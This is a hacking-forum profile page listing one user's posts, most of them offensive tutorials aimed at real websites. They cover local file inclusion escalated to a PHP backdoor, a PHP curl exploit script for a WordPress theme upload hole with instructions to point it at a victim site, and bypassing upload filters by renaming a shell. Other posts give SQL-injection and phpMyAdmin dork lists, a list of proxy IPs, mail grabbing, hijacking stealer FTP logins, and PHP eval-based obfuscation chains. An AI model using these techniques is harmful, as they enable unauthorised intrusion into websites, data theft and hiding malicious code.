Jump to content

hack3core

LvL-23
  • Posts

    38
  • Joined

  • Last visited

About hack3core

  • Birthday 04/29/1991

Recent Profile Visitors

The recent visitors block is disabled and is not being shown to other users.

hack3core's Achievements

Noob

Noob (2/5)

49

Reputation

  1. Re: Pro Hacking Crypter V 2.5 By Mя.Dzk!LLeя 4 Stub Thanks for the video
  2. Local file inclusion is a very popular web application attack, It was very common few years back. However now a days you will rarely find websites vulnerable to this attack. However a single vulnerability can result in getting your website compromised. We have already written an article on Directory transversal attack. Therefore I believe that we need no to go in details about the attack. You might know avinash by now the author of the previous article How Hackers Are Hacking Into Websites On Shared Hosts. However in this article he will demonstrate a local file inclusion vulnerability and he will enhance the attack by uploading a shell on the website. Here are some of the common parameters which are vulnerable to local file inclusion or remote file inclusion attacks. index.php?homepage= index.php?page= index.php?index2= Requirements: 1) A Vulnerable Website 2) Remote shell ( [Hidden Content] ) 3) User-Agent switcher ( [Hidden Content] ) 4) Mozilla Firefox The first thing which a hacker will do while finding a LFI vulnerability is to locate the /etc/passwd file. This file indicates that a local file inclusion vulnerability is present in the website. The image below explains the whole story “root” is the username, followed by “x” which happens to be the password, however here it’s shadowed, which means that it’s present is /etc/shadow file. Which is only accessible when you have root privileges. Next the hacker will check for /proc/self/environ. So change your path to /proc/self/environ/. The /proc/self/environ/ page should look something like this if the file exists, not all sites have it. Once the local file inclusion vulnerability has been identified , the hacker will try to perform remote code execution and try to some how to further acesss. This can be done by uploading a PHP backdoor. For that purpose a commonly used tool is Useragent switcher. Which can be downloaded from the link above. The hacker edits the useragent and changes code inside to the user agent to the following: Select your User-Agent in Tools > Default User Agent > PHP Info (Or whatever you User Agent is called) After refreshing the website, He then searches for the keyword "disable_functions" (Ctrl+F Search function) disable_functions | no value | no value The above function tells us that website is vulnerable to remote code execution and now we can upload the PHP backdoor. On the finding that the website is vulnerable he then tries to upload the shell by using the following command: Where the above code uploads a PHP backdoor in a text form and later renames it to .php. Now the shell has been successfully uploaded. Once the PHP backdoor has been uploaded it will look like the following: Thanks :D
  3. Re: Help me with RAT thanks boy-)
  4. Hi all, a have dynamic ip and closed all ports, how i can use RAT? Thanks
  5. Mail Address Dork Username and Password Dork Example URL Mail List I Use Mail Grabber Tool [Hidden Content] Enjoy! :)
  6. I'm glad to see you again-)
  7. hi all i very glad to see you-)) long time dont see-) There are two types of Stealers. 1. ftp Stealers 2. Php Stealers Before Starting you need to clear your cookies & private data for firefox, internet explorer, msn, etc etc.... for protecting your self. After clearing your private data now u need an sniffer. Good if you have Private one but also you can use free or trial versions. If you dont have 1 then Download from here. Code: >[Hidden Content] Ok after installing an sniffer run it & start monitoring your network adapter. After Starting it it will monitor all the incoming & Outgoing traffic. Now Goto your stealer's server & run it, In kaspersky Click on Allow now everytime it ask. 1st stealer read your private data (which u already wiped before starting this) and then send it over internet, kaspersky shows like this. Allow Just 1 time & then goto your sniffer, check at the ports where ftp is shown, the last access to ftp as shown here. Now in the list Double click on one of the outgoing traffic whose destination port is 'ftp'. Now the window appears in front of you is your desired target... Now open ftp client, enter his info username/pass, Fuck his Logs.... :h: The same method apply to php stealer, but cant see its logs, have a look.. Enjoy Cracking Stealers Have Fun
  8. > 202.112.31.203:1080 71.60.189.228:53838 202.120.7.122:1080 211.86.62.34:1080 202.38.95.66:1080 216.172.83.105:9713 176.36.68.60:20222 112.213.105.31:9999 176.106.252.98:9844 24.94.157.155:2152 180.169.125.49:8888 94.77.199.148:1080 60.29.104.197:1080 89.17.124.171:1080 204.210.211.250:54843 201.245.192.10:1080 196.223.13.230:1080 198.23.164.8:8888 50.121.6.59:10330 124.95.155.52:1080 121.17.125.15:1080 124.95.155.53:1080 122.0.125.148:1080 124.165.241.90:1080 113.106.90.81:1080 113.105.169.224:1080 121.14.36.182:1080 92.51.109.181:1080 124.95.155.27:1080 124.95.155.59:1080 112.95.238.81:1080 121.17.125.16:1080 120.151.111.104:1080 121.52.210.118:1080 193.238.111.26:1080 121.17.125.12:1080 106.3.32.153:1080 157.252.154.93:48047 62.44.12.63:1080 125.209.116.29:1080 119.148.160.243:1080 116.58.10.126:1080 118.103.239.242:1080 216.244.78.227:1080 78.36.14.195:1080 59.151.29.36:1080 5.66.186.185:10971 93.90.102.194:1080 58.249.119.242:1080
  9. Many people ask : how to use exploit CSRF / Remote File upload vulnerability ? I will answer it in this thread.You will find exploit in here : 1337day, exploit-db, packetstorm .. etc (Find it from Google)(HTML VERSION)If you find exploit something like this : >############################## Exploit Title: WordPress Amplus v3.x.x Themes CSRF File Upload Vulnerability# Author: Bebyyers404# Date: 11/17/2013# Infected Version: v3.x.x# Infected File: upload_handler.php# Category: webapps/php# Google dork: inurl:/wp-content/themes/Amplus_v3###############################POC & EXPLOIT Please choose a file: #File path:[Hidden Content]]###################################################################### How to make it works ?... Copy the exploit : > Please choose a file: NOTE : Change [Hidden Content] with your target (site vuln you got) And change /Amplus_v3.x.x/ with themes version in site victim.Check wordpress path before save.Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc Paste in notepad & Save with HTML extension. and open with firefox / chrome / etc.. you will see form uploader button. now upload your shell/image. & Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.(PHP VERSION)If you find exploit something like this : >################################################################################## Exploit Title: WordPress bordeaux-theme Themes Remote File Upload Vulnerability# Author: iskorpitx# Date: 12/11/2013# Vendor Homepage: [Hidden Content]# Themes Link: [Hidden Content]portfolio/bordeaux/# Infected File: upload-handler.php# Category: webapps# Google dork: "/wp-content/themes/bordeaux-theme/"# Tested on : Windows/Linux################################################################################## Exploit<?php $uploadfile="upload.php"; $ch = curl_init("[Hidden Content]"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?>access shell : [Hidden Content]################################################################################# How to make it works ?...Copy the exploit : ><?php $uploadfile="upload.php"; $ch = curl_init("[Hidden Content]"); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS,array('orange_themes'=>"@$uploadfile")); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $postResult = curl_exec($ch); curl_close($ch); print "$postResult"; ?> NOTE : YOU MUST HAVE PHP EXTENSION (ENVIRONMENT VARIABLE) PHP will running in CMD (Windows)Change [Hidden Content] with your target (site vuln you got) Check wordpress path before save.Because every site not same. maybe wordpress path available in "www.site.com/blog" or "www.site.com/wordpress" ...etc Paste in notepad & Save with PHP extension into folder ex: (exploit.php).Example :I have Exploit folder in C:/ directory. upload.php <-- in script exploit is name your shell, you can rename it anything you like. So i have upload.php and expoit.php already exist in the same folder.I will run this script with this command (CMD) : >C:\Users\Diizzy>cd \ExploitC:\Exploit>php exploit.php And you can access shell in here : [Hidden Content] : >[Hidden Content] Script Will Running With PHP Environment Variable Sorry for my english Correct me if i wrong
  10. Re: Base64 Encrypt-Decrypt Tool By Antopixel
  11. Hello Everyone! Today you will learn how to create your own proxy sites like speedproxy.co.uk , yellowproxy.net and bypassable.com etc etc... Anyway lets start... Requirements: 1-Proxy site script (click here) 2-Free web hosting account. 3-A liitle brain to use it. :P Method: 1-Download the proxy script from the above link. 2-Then upload whole script into your free hosting website via . 3-Then first time when you open your website , it will show you a page like admin.php here you can create your admin account which will use to modify your website whenever you will want to modify it. Live test: (click here)
  12. > inurl:group_concat username 0x3a PASSWORD from robot inurl:group_concat username 0x3a PASSWORD from pirates inurl:group_concat username 0x3a PASSWORD from obama inurl:group_concat username 0x3a PASSWORD from shadow inurl:group_concat username 0x3a PASSWORD from khan inurl:group_concat username 0x3a PASSWORD from paul inurl:group_concat username 0x3a PASSWORD from pakistan inurl:group_concat username 0x3a PASSWORD from hacker inurl:group_concat username 0x3a PASSWORD from users inurl:group_concat username 0x3a PASSWORD from adm inurl:group_concat username 0x3a PASSWORD from admin inurl:group_concat username 0x3a PASSWORD from user inurl:concat username 0x3a password from sysibm.sysdummy1 inurl:concat username 0x3a password from israel inurl:concat username 0x3a password from mr.bean inurl:concat username 0x3a password from sysuser inurl:concat username 0x3a password from sysadmin inurl:/MyBB/Upload/inc/ inurl:db_mysql.php inurl:sql.php?table=wp_users inurl:sql.php?table=group inurl:sql.php?table=phpMyAdmin inurl:sql.php?table=users inurl:sql.php?table=login inurl:/phpMyAdmin/sql.php inurl:sql.php?table=customer inurl:sql.php?table=member inurl:sql.php?table=account inurl:sql.php?table=admin inurl:sql.php?table=tblwhoislog inurl:/usr/local/apache/htdocs inurl:sql.php?table=jos_users inurl:sql.php?table=mybb_users inurl:sql.php?table=log inurl:sql.php?table=pass inurl:sql.php?table=information_schema inurl:sql.php?table=proxies_priv inurl:sql.php?table=mysql.user inurl:sql.php?table=collection inurl:sql.php?table=loginlog inurl:sql.php?table=menu inurl:sql.php?table=setting inurl:sql.php?table=phpbb_users inurl:/phpmyadmin/sql.php?db=mysql&sql_query= inurl:union+select+filetype:asp inurl:union+select+filetype:php inurl:union+select+filetype:cfm inurl:union 4.1.22-standard-log inurl:union 5.0.67-log inurl:union» 4.1.22-log inurl:union 5.0.32 inurl:union» 5.0.67 inurl:union» 5.0.51a-3ubuntu5 inurl:union» 5.1.63-cll inurl:bootstrap.php
  13. [align=center]hello brothers, perhaps you have it already knows and who does not know that I will teach, today we will talk about Decode and Encode Php code There are many ways to encode and decode PHP code. From the perspective of site security, there are three PHP functions — str_rot13(), base64_encode(), and gzinflate — that are frequently used to obfuscate malicious strings of PHP code. For those involved in the securing of websites, understanding how these functions are used to encode and decode encrypted chunks of PHP data is critical to accurate monitoring and expedient attack recovery.[/align] [align=center]Encoding and decoding with str_rot13()[/align] As explained in the PHP documentation, str_rot13() is a simple function used for rotating every letter “13 places in the alphabet” while ignoring non-alphanumeric characters. This type of encoding is called ROT13 encoding and it’s very straightforward using the str_rot13() function. Let’s look at an example.. Let’s say we want to ROT13-encode the following string: ><?php $string = 'Congratulations Anonymous; ?> We run this string through str_rot13() and set it as a variable named $encoded like so: ><?php $encoded = str_rot13($string); ?> Echoing the $encoded variable to the browser, we get this string of gibberish: >Pbatenghyngvbaf Nabalzbhf To decode a string encoded with str_rot13(), we simply run it back through the function to restore the original string. Here is an example that returns the original string to a variable named $decoded: >$decoded = str_rot13(str_rot13($string)) Echoing $decoded, we see the original string as expected: >Congratulations Anonymous Example: ><?php // str_rot13() example $string = 'Congratulations Anonymous'; $encoded = str_rot13($string); $decoded = str_rot13(str_rot13($string)); echo $encoded ."\n"; echo $decoded; ?> [align=center]Encode and decode with base64_encode() & base64_decode()[/align] Also explained in the PHP documentation. Ahh, I love taking stuff out of context, but I digress.. Let’s get back on track with a quick example showing how base64_encode() works its magic. Let’s say we want to encode the following string with base64: ><?php $string = 'Congratulations Anonymous'; ?> We run this string through base64_encode() and set it as a variable named $encoded like so: ><?php $encoded = base64_encode($string); ?> Echoing the $encoded variable to the browser, we get this string of gibberish: >Q29uZ3JhdHVsYXRpb25zIEFub255bW91cw== As you may count, the base64-encoded string contains around 33% more data than the original. Now to decode a string encoded with base64_encode, we use the converse function, base64_decode. Here is an example that returns the original string to a variable named $decoded: ><?php $decoded = base64_decode(base64_encode($string)); ?> Echoing $decoded, we see the original string as expected: >Congratulations Anonymous Example: ><?php // base64_encode()/base64_decode() example $string = 'Encoding and Decoding Encrypted PHP Code'; $encoded = base64_decode($string); $decoded = base64_decode(base64_encode($string)); echo $encoded ."\n"; echo $decoded; ?> [align=center]Deflate and inflate with gzdeflate() & gzinflate()[/align] PHP docs Let’s say we want to “gzdeflate” the following string: ><?php $string = 'Congratulations Anonymous'; ?> We run this string through gzdeflate() and set it as a variable named $compressed: ><?php $compressed = gzdeflate($string); ?> Echoing the $compressed variable to the browser, we get this bizarre-looking gibberish: >sНKОOaМKWHМKQpI…r\у’‹* JRS<њуSR To “decode” this alien-speak, we inflate it with the converse function, gzinflate(), to restore the original string. Here is an example that returns the original string to a variable named $uncompressed: >$uncompressed = gzinflate(gzdeflate($string)); Echoing $uncompressed, we see the original string as expected: >Congratulations Anonymous Example: ><?php // gzinflate()/gzdeflate() example $string = 'Encoding and Decoding Encrypted PHP Code'; $compressed = gzdeflate($string); $uncompressed = gzinflate($compressed); echo $compressed ."\n"; echo $uncompressed; ?> [align=center]Combined example: gzinflate(str_rot13(base64_decode()))[/align] Malicious scripts often combine multiple encoding methods to further obfuscate data strings. Using the numerous PHP encoding-type functions (and their various parameters), it’s possible to scramble data with many layers of obfuscation. For example, on common technique for encrypting malicious scripts combines all three of the functions described in this article. The structure of such technique looks like this: >$gibberish = eval(gzinflate(str_rot13(base64_decode($string)))); [align=center]Additional resources [/align] Into this decoding/ecoding stuff? You may also enjoy these fine functions.. chunk_split() — Split a string into smaller chunks convert_uuencode() — Uuencode a string gzcompress() — Compress a string gzuncompress() — Uncompress a compressed string gzencode() — Create a gzip compressed string All good hack!!
  14. Today I will tell you how to upload shell through Live HTTP Headers. :p Requirements:- Mozilla Firox Live HTTP Headers Add On for Firefox A shell So now lets begin, Login to that site as a admin, then find a place to upload a file in that particular site. Then rename your shell name to shell.php.jpg (or what ever that site supports. In my case, site supports onlyjpg file. Thats why i renamed it to shell.php.jpg.) Then start your Live HTTP Headers addon, after that upload your shell. Then your Live HTTP Headers will look something similar to this Then click on the shell.php.jpg, after click on Reply button. Then again a new window will open, in that window there will be two boxes, but we have to work on second box . In the second box, rename your shell.php.jpg toshell.php, then again click on Reply button. Now you have successfully done, only thing you have to do is to find the shell path. This is only for Educational purpose. Ill not responsible for any Illegal work done by you.

Chat Room

Chat Room

Chatroom Rules

No support in chat, open a thread.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.